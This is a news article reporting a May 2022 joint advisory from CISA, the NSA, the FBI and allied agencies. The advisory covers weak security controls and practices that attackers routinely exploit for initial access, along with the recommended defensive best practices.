Attacks and Vulnerabilities
CISA
Control device security
Critical infrastructure
Identity and Access Management (IAM)
Malware, Phishing & Ransomware
News
OT Network security
Perimeter security
Risk & Compliance
Secure Remote Access
Technology & Solutions
Threat Landscape
Vulnerabilities

New advisory warns of hackers routinely exploiting poor security controls and practices for initial access

May 18, 2022
New advisory warns of hackers routinely exploiting poor security controls and practices for initial access

Global cybersecurity agencies have come together for the second time in a week to issue another joint cybersecurity advisory. This time, the guidance has warned of malicious cyber hackers often exploiting common weak security controls, poor configurations, and poor security practices, which can be used to breach initial access techniques. The joint cybersecurity advisory identified on Tuesday that malicious hackers exploit public-facing applications, external remote services, phishing, trusted relationships, and valid accounts to gain initial access to victim networks.

The advisory, titled ‘Weak Security Controls and Practices Routinely Exploited for Initial Access,’ rolled out a list of best practices to safeguard systems, including control access, hardening credentials, establishing centralized log management, deploying antivirus solutions, employing detection tools, operating services exposed on internet-accessible hosts with secure configurations, and keeping software updated. The latest guidance follows last week’s warning to secure managed service providers (MSPs) and their customers from cyber threats after observing an increase in malicious cyber activity targeting such installations.

The Cybersecurity and Infrastructure Security Agency (CISA), the National Security Agency (NSA), and the FBI produced the advisory with help from the Canadian Centre for Cyber Security (CCCS), the New Zealand National Cyber Security Centre (NCSC-NZ), Computer Emergency Response Team (CERT NZ), the Netherlands National Cyber Security Centre (NCSC-NL), and the U.K. National Cyber Security Centre (NCSC-UK).

Security controls cover those safeguards or countermeasures primarily designed to protect the confidentiality, integrity, and availability of the system, its components, processes, and data.

The guidance also determined that multifactor authentication (MFA) is not enforced. MFA, particularly for remote desktop access, can help prevent account takeovers. With Remote Desktop Protocol (RDP) as a common infection vector for ransomware, MFA is a critical tool in mitigating malicious cyber activity. Furthermore, incorrect application of privileges or permissions and errors in access control lists allow unauthorized users or system processes to access objects.

“Unpatched software may allow an attacker to exploit publicly known vulnerabilities to gain access to sensitive information, launch a denial-of-service attack, or take control of a system,” the advisory said. This method has been identified as one of the most commonly found poor security practices.

The joint cybersecurity advisory notified about the use of vendor-supplied default configurations or default login usernames and passwords. “Many software and hardware products come ‘out of the box’ with overly permissive factory-default configurations intended to make the products user-friendly and reduce the troubleshooting time for customer service. However, leaving these factory default configurations enabled after installation may provide avenues for an attacker to exploit,” it added. 

Network devices are also often pre-configured with default administrator usernames and passwords to simplify setup, the advisory said. These default credentials are not secure, as they may be physically labeled on the device or even readily available on the internet. “Leaving these credentials unchanged creates opportunities for malicious activity, including gaining unauthorized access to information and installing malicious software. Network defenders should also be aware that the same considerations apply for extra software options, which may come with preconfigured default settings,” it added.

Another important insight from the advisory was that remote services, such as a virtual private network (VPN), lack sufficient controls to prevent unauthorized access. “During recent years, malicious threat actors have been observed targeting remote services. Network defenders can reduce the risk of remote service compromise by adding access control mechanisms, such as enforcing MFA, implementing a boundary firewall in front of a VPN, and leveraging intrusion detection system/intrusion prevention system sensors to detect anomalous network activity,” it added. 

“Malicious cyber actors can use a myriad of methods to exploit weak, leaked, or compromised passwords and gain unauthorized access to a victim system. Malicious cyber actors have used this technique in various nefarious acts and prominently in attacks targeting RDP,” the advisory said. Additionally, cloud services are unprotected, while misconfigured cloud services are common targets for cyber actors. Poor configurations can allow for sensitive data theft and even cryptojacking, it added.

“Cyber actors send emails with malicious macros—primarily in Microsoft Word documents or Excel files—to infect computer systems,” the advisory said. Initial infection can occur in various ways, such as when a user opens or clicks a malicious download link, PDF, or macro-enabled Microsoft Word document included in phishing emails. The guidance also covered poor endpoint detection and response. “Cyber actors use obfuscated malicious scripts and PowerShell attacks to bypass endpoint security controls and launch attacks on target devices. These techniques can be difficult to detect and protect against,” it added.

The advisory recommended that organizations can help strengthen their network defenses against common exploited weak security controls and practices by controlling access. Measures such as adopting a zero-trust security model that eliminates implicit trust, limits the ability of a local administrator account, and controls who has access to organizational data and services could come into play. 

Furthermore, the guidance advised implementing credential hardening, establishing centralized log management, employing antivirus programs, deploying appropriate detection tools, and searching for vulnerabilities. The advisory also called for the maintenance of rigorous configuration management programs and ​​the initiation of a software and patch management program.

“As long as these security holes exist, malicious cyber actors will continue to exploit them,” Rob Joyce, NSA Cybersecurity Director, said in a media statement. “We encourage everyone to mitigate these weaknesses by implementing the recommended best practices.”

Industrial cybersecurity firm Dragos had assessed last month with high confidence that the biggest cybersecurity weaknesses European industrial infrastructure asset owners currently face are lack of asset visibility into their network and weak network authentication policies. In addition, the company gauged with low confidence that Europe is at low risk for localized or small-scale disruption or destruction, as motivated state-executed adversaries may perform low-stakes operations when deemed politically or economically advantageous.

Last month, U.S. security agencies and the Department of Energy (DOE) warned in a joint cybersecurity advisory that specific advanced persistent threat (APT) hackers have exhibited the capability to gain full system access to multiple industrial control system (ICS)/supervisory control and data acquisition (SCADA) devices. In addition, the APT hackers can leverage the modules to interact with targeted ICS/SCADA devices, enabling operations by lower-skilled cyber hackers to emulate higher-skilled hacker capabilities.

Anna Ribeiro
Industrial Cyber News Editor. Anna Ribeiro is a freelance journalist with over 14 years of experience in the areas of security, data storage, virtualization and IoT.

A complimentary guide to the who`s who in industrial cybersecurity tech & solutions

Free Download

Related

MITRE confirms breach on NERVE network, suspected foreign nation-state actor involved
MITRE confirms breach on NERVE network, suspected foreign nation-state actor involved
Radiflow helps customers achieve NIS2 compliance, spurring growth in Europe
Radiflow, Exclusive Networks partner to elevate OT cybersecurity
MITRE plans to enhance cybersecurity in 2024 with ICS sub-techniques and multi-domain integration
MITRE plans to enhance cybersecurity in 2024 with ICS sub-techniques and multi-domain integration
New bill introduced to set up Water Risk and Resilience Organization to secure water systems from cyber threats
New bill introduced to set up Water Risk and Resilience Organization to secure water systems from cyber threats
CISA, FBI, Europol, and NCSC-NL issue joint cybersecurity advisory on Akira ransomware threats
CISA, FBI, Europol, and NCSC-NL issue joint cybersecurity advisory on Akira ransomware threats
Mandiant exposes APT44, Russia's Sandworm cyber sabotage unit, targeting global critical infrastructure
Mandiant exposes APT44, Russia’s Sandworm cyber sabotage unit, targeting global critical infrastructure
Hexagon and Dragos announce technical alliance to boost industrial cybersecurity, reduce overall OT cyber risk
Hexagon and Dragos announce technical alliance to boost industrial cybersecurity, reduce overall OT cyber risk
Armis
Armis acquires Silk Security for $150 million to enhance AI-driven cybersecurity capabilities
Nozomi discovers five vulnerabilities in AMI MegaRAC SP-X BMC, exposing OT, IOT devices to RCE attacks
Nozomi secures US$1.25 million US Air Force contract to boost DoD critical infrastructure security
Industrial Cybersecurity Buyers’ Guide 2024 navigates complex industrial landscape
Industrial Cybersecurity Buyers’ Guide 2024 navigates complex industrial landscape